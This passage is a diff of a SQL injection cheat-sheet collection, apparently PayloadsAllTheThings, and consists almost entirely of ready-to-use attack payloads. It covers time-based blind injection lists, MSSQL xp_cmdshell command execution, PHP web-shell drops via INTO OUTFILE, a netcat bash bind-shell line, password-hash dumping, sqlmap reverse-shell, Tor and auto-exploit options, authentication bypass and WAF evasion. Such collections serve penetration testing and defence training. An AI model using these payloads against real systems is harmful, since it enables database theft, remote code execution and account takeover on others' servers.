 ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
--- a/injection/Intruders/payloads-sql-blind-MySQL-WHERE
+++ b/injection/Intruders/payloads-sql-blind-MySQL-WHERE
@@ -0,0 +1,45 @@
 and 0=benchmark(3000000,MD5(1))%20/*
 and 0=benchmark(3000000,MD5(1))%20--
 and 0=benchmark(3000000,MD5(1))%20%23
 ' and 0=benchmark(3000000,MD5(1))%20/*
 ' and 0=benchmark(3000000,MD5(1))%20--
 ' and 0=benchmark(3000000,MD5(1))%20%23
 " and 0=benchmark(3000000,MD5(1))%20/*
 " and 0=benchmark(3000000,MD5(1))%20--
 " and 0=benchmark(3000000,MD5(1))%20%23
 ) and 0=benchmark(3000000,MD5(1))%20/*
 ) and 0=benchmark(3000000,MD5(1))%20--
 ) and 0=benchmark(3000000,MD5(1))%20%23
 )) and 0=benchmark(3000000,MD5(1))%20/*
 )) and 0=benchmark(3000000,MD5(1))%20--
 )) and 0=benchmark(3000000,MD5(1))%20%23
 ))) and 0=benchmark(3000000,MD5(1))%20/*
 ))) and 0=benchmark(3000000,MD5(1))%20--
 ))) and 0=benchmark(3000000,MD5(1))%20%23
 )))) and 0=benchmark(3000000,MD5(1))%20/*
 )))) and 0=benchmark(3000000,MD5(1))%20--
 )))) and 0=benchmark(3000000,MD5(1))%20%23
 ') and 0=benchmark(3000000,MD5(1))%20/*
 ') and 0=benchmark(3000000,MD5(1))%20--
 ') and 0=benchmark(3000000,MD5(1))%20%23
 ") and 0=benchmark(3000000,MD5(1))%20/*
 ") and 0=benchmark(3000000,MD5(1))%20--
 ") and 0=benchmark(3000000,MD5(1))%20%23
 ')) and 0=benchmark(3000000,MD5(1))%20/*
 ')) and 0=benchmark(3000000,MD5(1))%20--
 ')) and 0=benchmark(3000000,MD5(1))%20%23
 ")) and 0=benchmark(3000000,MD5(1))%20/*
 ")) and 0=benchmark(3000000,MD5(1))%20--
 ")) and 0=benchmark(3000000,MD5(1))%20%23
 '))) and 0=benchmark(3000000,MD5(1))%20/*
 '))) and 0=benchmark(3000000,MD5(1))%20--
 '))) and 0=benchmark(3000000,MD5(1))%20%23
 "))) and 0=benchmark(3000000,MD5(1))%20/*
 "))) and 0=benchmark(3000000,MD5(1))%20--
 "))) and 0=benchmark(3000000,MD5(1))%20%23
 ')))) and 0=benchmark(3000000,MD5(1))%20/*
 ')))) and 0=benchmark(3000000,MD5(1))%20--
 ')))) and 0=benchmark(3000000,MD5(1))%20%23
 ")))) and 0=benchmark(3000000,MD5(1))%20/*
 ")))) and 0=benchmark(3000000,MD5(1))%20--
 ")))) and 0=benchmark(3000000,MD5(1))%20%23
--- a/injection/MSSQL
+++ b/injection/MSSQL
@@ -1,22 +1,33 @@
 # MSSQL Injection
 ## MSSQL comments
 ```sql
 -- comment goes here
 /* comment goes here */
 ```
 ## MSSQL version
 ```sql
 SELECT @@version
 ```
 ## MSSQL database name
 ```sql
 SELECT DB_NAME()
 ```
 ## MSSQL List Databases
 ```sql
 SELECT name FROM master..sysdatabases;
 SELECT DB_NAME(N); — for N = 0, 1, 2, …
 ```
 ## MSSQL List Column
 ```sql
 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
@@ -25,6 +36,7 @@ SELECT table_catalog, column_name FROM information_schema.columns
 ```
 ## MSSQL List Tables
 ```sql
 SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
 SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
@@ -33,8 +45,8 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
 SELECT table_catalog, table_name FROM information_schema.columns
 ```
 ## MSSQL User Password
 ```sql
 MSSQL 2000:
 SELECT name, password FROM master..sysxlogins
@@ -46,6 +58,7 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.
 ```
 ## MSSQL Error based
 ```sql
 For integer inputs : convert(int,@@version)
 For integer inputs : cast((SELECT @@version) as int)
@@ -54,8 +67,8 @@ For string inputs   : ' + convert(int,@@version) + '
 For string inputs   : ' + cast((SELECT @@version) as int) + '
 ```
 ## MSSQL Blind based
 ```sql
 SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
@@ -64,6 +77,7 @@ SELECT message FROM data WHERE row = 1 and message like 't%'
 ```
 ## MSSQL Time based
 ```sql
 ProductID=1;waitfor delay '0:0:10'--
 ProductID=1);waitfor delay '0:0:10'--
@@ -75,18 +89,23 @@ IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'                              com
 ```
 ## MSSQL Stacked Query
 Use a semi-colon ";" to add another query
 ```sql
 ProductID=1; DROP members--
 ```
 ## MSSQL Command execution
 ```sql
-EXEC xp_cmdshell "net user";           
+EXEC xp_cmdshell "net user";
 EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
 EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
 ```
 If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
 ```sql
 EXEC sp_configure 'show advanced options',1
 RECONFIGURE
@@ -95,11 +114,13 @@ RECONFIGURE
 ```
 ## MSSQL Make user DBA (DB admin)
 ```sql
 EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ```
 ## Thanks to
- * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+
- * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
+* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
- * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
+* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
 * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
--- a/injection/MySQL
+++ b/injection/MySQL
@@ -1,6 +1,7 @@
 # MYSQL Injection
-## MySQL Comment
+## MySQL
 ```sql
 # MYSQL Comment
 /* MYSQL Comment */
@@ -9,7 +10,9 @@
 ```
 ## Detect columns number
 Using a simple ORDER
 ```sql
 order by 1
 order by 2
@@ -19,6 +22,7 @@ order by XXX
 ```
 ## MySQL Union Based
 ```sql
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
@@ -27,12 +31,14 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 ## MySQL Error Based - Basic
 ```sql
 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
 ```
 ## MYSQL Error Based - UpdateXML function
 ```sql
 AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
 AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
@@ -42,12 +48,14 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
 ```
 Shorter to read:
 ```sql
 ' and updatexml(null,concat(0x0a,version()),null)-- -
 ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
 ```
 ## MYSQL Error Based - Extractvalue function
 ```sql
 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
@@ -57,7 +65,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
 ```
 ## MYSQL Blind using a conditional statement
 TRUE: `if @@version starts with a 5`:
 ```sql
 2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 Response:
@@ -65,6 +75,7 @@ HTTP/1.1 500 Internal Server Error
 ```
 False: `if @@version starts with a 4`:
 ```sql
 2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
 Response:
@@ -72,6 +83,7 @@ HTTP/1.1 200 OK
 ```
 ## MYSQL Blind with MAKE_SET
 ```sql
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
 AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
@@ -80,31 +92,36 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 ## MYSQL Time Based
 ```sql
 +BENCHMARK(40000000,SHA1(1337))+
 '%2Bbenchmark(3200,SHA1(1))%2B'
 ' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
-RLIKE SLEEP([SLEEPTIME])                                           
+RLIKE SLEEP([SLEEPTIME])
-OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))                     
+OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
 ```
 ## MYSQL Read content of a file
 ```sql
 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 ```
 ## MySQL DIOS - Dump in One Shot
 ```sql
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
 ```
 ## MYSQL DROP SHELL
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
 SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
 -1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
 [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
 [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
--- a/injection/OracleSQL
+++ b/injection/OracleSQL
@@ -1,11 +1,13 @@
 # Oracle SQL Injection
 ## Oracle SQL version
 ```sql
 SELECT user FROM dual UNION SELECT * FROM v$version
 ```
 ## Oracle SQL database name
 ```sql
 SELECT global_name FROM global_name;
 SELECT name FROM V$DATABASE;
@@ -14,17 +16,20 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
 ```
 ## Oracle SQL List Databases
 ```sql
 SELECT DISTINCT owner FROM all_tables;
 ```
 ## Oracle SQL List Column
 ```sql
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
 ```
 ## Oracle SQL List Tables
 ```sql
 SELECT table_name FROM all_tables;
 SELECT owner, table_name FROM all_tables;
@@ -39,8 +44,7 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | CTXSYS.DRITHSX.SN     | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
 | Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
 | Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual |
-| Invalid XML	          | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users |
+| Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users |
 ## Oracle SQL Blind
@@ -53,11 +57,13 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
 | First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
 ## Oracle SQL Time based
 ```sql
 AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
 ```
 ## Oracle SQL Command execution
 ```sql
 /* create Java class */
 BEGIN
@@ -73,6 +79,7 @@ END;
 /* run OS command */
 SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 ```
 or (hex encoded)
 ```sql
@@ -85,4 +92,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
 ```
 ## Thanks to
- * [Heavily taken inspired by - NetSpi SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
+
 * [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
--- a/injection/PostgreSQL
+++ b/injection/PostgreSQL
@@ -1,13 +1,15 @@
 # POSTGRESQL
 ## PostgreSQL Comments
-```
+
 ```sql
 --
 /**/  
 ```
 ## PostgreSQL Error Based - Basic
-```
+
 ```sql
 ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
 ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
@@ -15,7 +17,33 @@
 ```
 ## PostgreSQL Time Based
-```
+
 ```sql
 AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) 
+AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-```
+```
 ## PostgreSQL File Read
 ```sql
 select pg_read_file('PG_VERSION', 0, 200);
 ```
 ```sql
 CREATE TABLE temp(t TEXT);
 COPY temp FROM '/etc/passwd';
 SELECT * FROM temp limit 1 offset 0;
 ```
 ## PostgreSQL File Write
 ```sql
 CREATE TABLE pentestlab (t TEXT);
 INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
 SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```
 ## Thanks to
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,25 +1,29 @@
 # SQL injection
-A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
+
 A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
 ## Summary
 * [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
 * [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
 * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
 * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
 * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
 * [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md)
 * [Entry point detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)
 * [Authentication bypass](#authentication-bypass)
 * [Polyglot injection](#polyglot-injection-multicontext)
-* [Second order injection](#second-order-injection)
+* [Routed injection](#routed-injection)
 * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
 * [WAF Bypass](#waf-bypass)
 ## Entry point detection
 Detection of an SQL injection entry point
 Simple characters
 ```sql
 '
 %27
@@ -34,12 +38,14 @@ Wildcard (*)
 ```
 Multiple encoding
 ```sql
 %%2727
 %25%27
 ```
 Merging characters
 ```sql
 `+HERP
 '||'DERP
@@ -50,7 +56,8 @@ Merging characters
 ```
 Logic Testing
-```
+
 ```sql
 page.asp?id=1 or 1=1 -- true
 page.asp?id=1' or 1=1 -- true
 page.asp?id=1" or 1=1 -- true
@@ -58,7 +65,8 @@ page.asp?id=1 and 1=2 -- false
 ```
 Weird characters
-```
+
 ```sql
 Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
 transformed into U+0022 QUOTATION MARK (")
 Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
@@ -66,6 +74,7 @@ transformed into U+0027 APOSTROPHE (')
 ```
 ## DBMS Identification
 ```c
 ["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
 ["connection_id()=connection_id()"                 ,"MYSQL"],
@@ -94,27 +103,31 @@ transformed into U+0027 APOSTROPHE (')
 ["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
 ```
 ## SQL injection using SQLmap
 Basic arguments for SQLmap
-```
+
 ```powershell
 sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
 ```
 Custom injection in UserAgent/Header/Referer/Cookie
-```
+
 ```powershell
 python sqlmap.py -u "http://example.com" --data "username=admin&password=pass"  --headers="x-forwarded-for:127.0.0.1*"
 The injection is located at the '*'
 ```
 Second order injection
-```
+
 ```powershell
 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
 ```
 Shell
-```
+
 ```powershell
 SQL Shell
 python sqlmap.py -u "http://example.com/?id=1"  -p id --sql-shell
@@ -125,13 +138,37 @@ Dropping a reverse-shell / meterpreter
 python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn
 ```
-Using suffix to tamper the injection
+Crawl a website with SQLmap and auto-exploit
 ```powershell
 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
 --crawl = how deep you want to crawl a site
 --forms = Parse and test forms
 ```
 Using TOR with SQLmap
 ```powershell
 sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
 ```
 Using Chrome cookie and a Proxy
 ```powershell
 sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080"  -f  --time-sec 15 --level 3
 ```
 Using suffix to tamper the injection
 ```powershell
 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```
 General tamper option and tamper's list
-```
+
 ```powershell
 tamper=name_of_the_tamper
 ```
@@ -184,6 +221,7 @@ tamper=name_of_the_tamper
 |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
 ## Authentication bypass
 ```sql
 '-'
 ' '
@@ -277,19 +315,38 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 ## Authentication Bypass (Raw MD5)
 When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
 ```php
 "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
 ```
 Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
 ```php
 md5("ffifdyop", true) = 'or'6<EFBFBD>]<EFBFBD><EFBFBD>!r,<EFBFBD><EFBFBD>b
 ```
 Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
 ## Polyglot injection (multicontext)
 ```sql
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
-## Second order injection
+## Routed injection
 ```sql
 admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
 ```
 ## Insert Statement - ON DUPLICATE KEY UPDATE
 ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
 ```sql
 Inject using payload:
  attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
@@ -303,10 +360,10 @@ Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL
 After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
 ```
 ## WAF Bypass
 No Space (%20) - bypass using whitespace alternatives
 ```sql
 ?id=1%09and%091=1%09--
 ?id=1%0Dand%0D1=1%0D--
@@ -317,16 +374,19 @@ No Space (%20) - bypass using whitespace alternatives
 ```
 No Whitespace - bypass using comments
 ```sql
 ?id=1/*comment*/and/**/1=1/**/--
 ```
 No Whitespace - bypass using parenthesis
 ```sql
 ?id=(1)and(1)=(1)--
 ```
 No Comma - bypass using OFFSET, FROM and JOIN
 ```sql
 LIMIT 0,1         -> LIMIT 1 OFFSET 0
 SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
@@ -334,6 +394,7 @@ SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
 ```
 Blacklist using keywords - bypass using uppercase/lowercase
 ```sql
 ?id=1 AND 1=1#
 ?id=1 AnD 1=1#
@@ -341,6 +402,7 @@ Blacklist using keywords - bypass using uppercase/lowercase
 ```
 Blacklist using keywords case insensitive - bypass using an equivalent operator
 ```sql
 AND   -> &&
 OR    -> ||
@@ -350,6 +412,7 @@ WHERE -> HAVING
 ```
 Information_schema.tables Alternative
 ```sql
 select * from mysql.innodb_table_stats;
 +----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
@@ -367,10 +430,10 @@ mysql> show tables in dvwa;
 | guestbook      |
 | users          |
 +----------------+
 ```
 Version Alternative
 ```sql
 mysql> select @@innodb_version;
 +------------------+
@@ -394,37 +457,36 @@ mysql> mysql> select version();
 +-------------------------+
 ```
 ## Thanks to - Other resources
 * Detect SQLi
-  - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+  * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
-  - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
+  * [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
 * MySQL:
-  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
+  * [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
-  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
+  * [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
-  - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
+  * [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
-  - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
+  * [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
 * MSSQL:
-  - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
+  * [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
-  - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+  * [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * ORACLE:
-  - [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
+  * [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
 * POSTGRESQL:
-  - [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
+  * [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
 * Others
-  - [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
+  * [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
-  - [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
+  * [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
-  - [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
+  * [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
-  - [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
+  * [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
-  - [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
+  * [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
-  - [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
+  * [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
-  - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
+  * [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
-  - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
+  * [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
-  - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
+  * [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
-  - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+  * [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
 * Second Order:
-  - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
+  * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
